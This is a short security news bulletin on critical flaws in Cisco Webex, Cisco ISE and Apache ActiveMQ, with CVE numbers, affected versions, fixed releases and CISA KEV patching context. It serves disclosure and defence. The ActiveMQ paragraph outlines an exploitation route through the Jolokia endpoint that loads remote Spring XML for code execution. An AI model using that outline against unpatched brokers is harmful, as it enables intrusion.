Multiple critical software flaws

A software flaw is a bug that can let outsiders slip past normal checks, and three newly disclosed cases put Cisco and Apache users on patch notice this week. (cisco.com) Cisco said on April 15 that a Webex Services bug, tracked as CVE-2026-20184, could let an unauthenticated remote attacker impersonate any user in the service. The issue came from improper certificate validation in single sign-on with Control Hub, and Cisco scored it 9.8 out of 10. (cisco.com) Certificates are digital ID cards for online systems; if software fails to check them correctly, it can trust a fake one. Cisco said customers using trust anchors in their Webex single sign-on setup must upload a new identity provider SAML certificate in Control Hub to avoid service interruption, even though Cisco already fixed the cloud service itself. (cisco.com) Cisco also published two critical advisories for Identity Services Engine, the product many companies use to decide which users and devices get onto a network. In one April 15 advisory, CVE-2026-20147 and CVE-2026-20148 could let an authenticated remote attacker with valid administrative credentials run code or traverse paths on Cisco ISE and ISE Passive Identity Connector. (cisco.com) In a separate April 15 advisory, CVE-2026-20180 and CVE-2026-20186 could let an authenticated remote attacker with at least Read Only Admin credentials execute commands on the underlying operating system of Cisco ISE. Cisco said successful exploitation in single-node deployments could knock the node offline and block new endpoints from authenticating to the network until it is restored. (cisco.com) Those Cisco ISE bugs did not require a public-facing stranger with no access; the attacker needed admin-level credentials first. Cisco said there are no workarounds for the ISE flaws and told customers to move to fixed software releases. (cisco.com) Apache ActiveMQ users are dealing with a different problem: a message broker bug that can turn a management feature into a code-execution path. Apache said CVE-2026-34197 affects ActiveMQ Broker before 5.19.4 and versions 6.0.0 through 6.2.2, and recommended upgrading to 5.19.4 or 6.2.3. (apache.org) Apache said the flaw sits in ActiveMQ Classic’s Jolokia JMX-HTTP bridge, exposed at `/api/jolokia/` on the web console. An authenticated attacker could use allowed exec operations on ActiveMQ MBeans with a crafted URI to load a remote Spring XML context and trigger arbitrary code execution in the broker’s Java process. (apache.org) CISA’s Known Exploited Vulnerabilities catalog is the federal government’s list of bugs seen in real-world attacks, and agencies use it to set patch deadlines. CISA says federal civilian agencies must follow Binding Operational Directive 22-01 for cataloged flaws, and the agency says all organizations should prioritize KEV-listed vulnerabilities in their patching plans. (cisa.gov 1) (cisa.gov 2) Cisco said it was not aware of public announcements or malicious use of the Webex certificate bug as of its advisory update on April 16. The immediate to-do list is narrower than the headlines suggest: Webex customers need to check whether they use trust anchors, ISE administrators need fixed releases, and ActiveMQ operators need to move off affected versions. (cisco.com 1) (cisco.com 2) (apache.org)